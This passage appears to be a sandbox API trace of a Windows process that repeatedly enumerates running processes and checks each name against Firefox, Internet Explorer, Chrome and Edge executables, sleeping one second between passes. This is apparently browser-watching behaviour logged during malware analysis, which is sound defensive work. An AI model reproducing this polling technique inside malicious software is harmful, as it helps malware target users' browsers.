cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0252.612] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0252.612] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0252.612] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0252.612] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.612] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0252.612] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0252.612] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0252.612] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0252.612] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.612] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0252.613] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0252.613] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0252.613] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0252.613] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.613] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0252.613] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0252.613] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0252.613] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0252.613] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.613] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0252.614] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0252.614] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0252.614] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0252.614] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.614] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0252.615] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0252.615] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0252.615] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0252.615] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.615] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0252.615] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0252.615] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0252.615] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0252.615] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.615] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0252.616] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0252.616] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0252.616] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0252.616] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.616] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0252.616] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0252.616] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0252.616] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0252.616] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.616] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0252.617] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0252.617] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0252.617] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0252.617] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.617] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0252.617] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0252.617] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0252.617] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0252.617] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.617] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0252.618] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0252.618] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0252.618] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0252.618] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.618] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0252.618] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0252.618] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0252.619] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0252.619] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.619] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0252.619] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0252.619] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0252.619] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0252.619] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.619] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0252.620] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0252.620] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0252.620] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0252.620] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.620] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0252.620] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0252.620] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0252.620] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0252.620] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.620] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0252.621] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0252.621] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0252.621] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0252.621] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.621] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0252.621] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0252.622] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0252.622] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0252.622] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.622] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0252.622] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0252.622] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0252.622] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0252.622] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.622] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0252.623] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0252.623] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0252.623] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0252.623] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.623] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0252.623] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0252.623] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0252.623] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0252.623] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.623] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0252.624] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0252.624] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0252.624] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0252.624] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.624] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.624] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0252.624] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0252.624] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0252.624] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.624] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.625] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.625] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.625] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.625] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.625] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0252.626] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0252.626] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0252.626] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0252.626] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.626] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.626] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.626] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.626] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.626] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.626] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0252.627] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0252.627] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0252.627] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0252.627] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.627] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.627] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0252.627] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0252.627] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0252.627] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.627] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0252.628] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0252.628] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0252.628] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0252.628] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.628] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.628] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0252.628] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0252.628] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0252.628] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.628] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.629] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0252.629] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0252.629] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0252.629] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.629] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.630] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0252.630] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0252.630] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0252.630] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.630] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.630] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0252.630] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0252.630] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0252.630] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.630] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.631] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0252.631] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0252.631] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0252.631] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.631] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0252.631] CloseHandle (hObject=0xd4) returned 1 [0252.631] Sleep (dwMilliseconds=0x3e8) [0253.634] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0253.635] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.636] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0253.636] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0253.636] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0253.636] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0253.636] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0253.636] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0253.636] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0253.636] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0253.636] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0253.636] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0253.637] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0253.637] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0253.637] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0253.637] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.637] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.637] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0253.638] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0253.638] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0253.638] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.638] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0253.638] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0253.638] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0253.638] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0253.638] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.638] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.639] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0253.639] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0253.639] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0253.639] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.639] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: 